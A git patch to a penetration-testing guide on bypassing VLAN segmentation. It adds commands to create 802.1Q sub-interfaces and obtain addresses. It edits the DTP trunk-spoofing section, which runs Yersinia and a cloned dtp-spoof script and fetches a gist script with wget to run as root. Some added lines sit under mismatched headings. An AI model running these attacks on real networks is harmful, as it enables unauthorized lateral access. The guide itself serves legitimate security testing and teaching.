From 8aacbc1dd1fe0c6bd64bc9210f7c6d89ed363248 Mon Sep 17 00:00:00 2001
From: SirBroccoli <carlospolop@gmail.com>
Date: Mon, 18 Aug 2025 13:59:20 +0200
Subject: [PATCH] Update lateral-vlan-segmentation-bypass.md

---
 .../lateral-vlan-segmentation-bypass.md       | 25 +++++++++++++++----
 1 file changed, 20 insertions(+), 5 deletions(-)

diff --git a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md
index 250e30159..0e04c9138 100644
--- a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md
@@ -36,6 +36,10 @@ sudo vconfig add eth0 10
 sudo vconfig add eth0 20
 sudo vconfig add eth0 50
 sudo vconfig add eth0 60
+sudo ifconfig eth0.10 up
+sudo ifconfig eth0.20 up
+sudo ifconfig eth0.50 up
+sudo ifconfig eth0.60 up
 
 # Modern (ip-link – preferred)
 sudo modprobe 8021q
@@ -43,6 +47,8 @@ sudo ip link add link eth0 name eth0.10 type vlan id 10
 sudo ip link add link eth0 name eth0.20 type vlan id 20
 sudo ip link set eth0.10 up
 sudo ip link set eth0.20 up
+sudo dhclient -v eth0.50
+sudo dhclient -v eth0.60
 ```
 
 Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured:
@@ -55,6 +61,8 @@ sudo dhclient -v eth0.20
 Example for manually setting a static IP address on an interface (VLAN 10):
 
 ```bash
+sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
+# or
 sudo ip addr add 10.10.10.66/24 dev eth0.10
 ```
 
@@ -76,18 +84,25 @@ Cisco switches that keep DTP enabled will happily negotiate a trunk if the peer
 
 ```bash
 # Become a trunk using Yersinia (GUI)
-$ sudo yersinia -G          # Launch GUI → Launch attack → DTP → enabling trunking
+sudo yersinia -G          # Launch GUI → Launch attack → DTP → enabling trunking
 
 # Python PoC (dtp-spoof)
-$ git clone https://github.com/fleetcaptain/dtp-spoof.git
-$ sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable
+git clone https://github.com/fleetcaptain/dtp-spoof.git
+sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable
 ```
 
 Recon helper (passively fingerprint the port’s DTP state):
 
 ```bash
-$ wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py
-$ sudo python3 dtpscan.py -i eth0
+sudo modprobe 8021q
+sudo ip link add link eth0 name eth0.30 type vlan id 30
+sudo ip addr add 10.10.30.66/24 dev eth0.30
+sudo ip link set eth0.30 up
+
+# or
+
+wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py
+sudo python3 dtpscan.py -i eth0
 ```
 
 Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section.